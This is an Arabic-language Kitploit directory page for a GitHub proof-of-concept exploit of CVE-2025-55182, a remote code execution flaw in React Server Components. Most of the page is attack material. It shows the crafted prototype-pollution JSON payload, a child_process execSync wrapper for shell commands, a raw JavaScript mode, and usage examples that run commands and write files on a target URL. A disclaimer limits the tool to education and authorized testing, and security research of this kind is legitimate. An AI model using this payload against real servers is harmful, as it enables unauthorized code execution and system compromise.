Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
react-ssr-vulnerability — هذا سكريبت POC لـ CVE-2025-55182 (React SSR RCE) | Kitploit
أدوات/GitHubGitHub/darker-ink/react-ssr-vulnerability
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubdarker-ink/react-ssr-vulnerability

react-ssr-vulnerability

هذا سكريبت POC لـ CVE-2025-55182 (React SSR RCE)

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182 - إثبات المفهوم لـ RCE في مكونات الخادم React

هذا إثبات مفهوم لأغراض تعليمية وأبحاث أمنية فقط. تم تصحيح هذه الثغرة في أحدث إصدارات الحِزم المتأثرة. استخدم هذه الأداة فقط على الأنظمة التي تملكها أو التي لديك إذن صريح لاختبارها. لست مسؤولاً عن أي إجراءات قانونية تُتخذ ضدك.

بناء الحمولة

يستغل الاستغلال كائن JSON مُصمم خصيصًا يُسيء استخدام سلسلة النماذج الأولية (prototype chain) في JavaScript:

root@kitploit:~
{
  "then": "$1:__proto__:then",           // يُلوّث سلسلة النماذج الأولية
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": jsCode,                    // كود خبيث محقون
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

تغليف الأوامر

يدعم إثبات المفهوم وضعين:

الوضع القياسي (افتراضي):

root@kitploit:~
process.mainModule.require("child_process").execSync("YOUR_COMMAND");

يُغلّف أوامر shell للتنفيذ عبر child_process في Node.js.

الوضع الخام (العلم --raw):

root@kitploit:~
// ينفذ JavaScript تعسفيًا مباشرةً

يسمح بتنفيذ كود JavaScript مباشر دون تغليف أوامر shell.

الاستخدام

تنفيذ أمر أساسي

root@kitploit:~
bun run index.ts <command_file> <target_url>

مثال:

root@kitploit:~
# إنشاء ملف الأمر
echo "whoami" > cmd.txt

# التنفيذ ضد نقطة النهاية المعرضة للخطر
bun run index.ts cmd.txt http://localhost:3000

وضع JavaScript الخام

root@kitploit:~
bun run index.ts --raw <js_file> <target_url>

مثال:

root@kitploit:~
# إنشاء حمولة JavaScript
echo "require('fs').writeFileSync('/tmp/pwned.txt', 'RCE Success')" > payload.js

# تنفيذ JavaScript الخام
bun run index.ts --raw payload.js http://localhost:3000

الوسائط

  • <file_path>: مسار الملف الذي يحتوي على الأمر أو كود JavaScript
  • <target_url>: رابط نقطة النهاية لوظيفة الخادم React
  • --raw: (اختياري) تنفيذ JavaScript خام بدلاً من أوامر shell

الإسناد

اكتشفها: Lachlan Davidson
أُفْصِح عنها بواسطة: فريق React وفريق أمان Meta

المراجع

  • إعلان الأمان الرسمي لـ React
  • CVE-2025-55182
تنزيل الأداة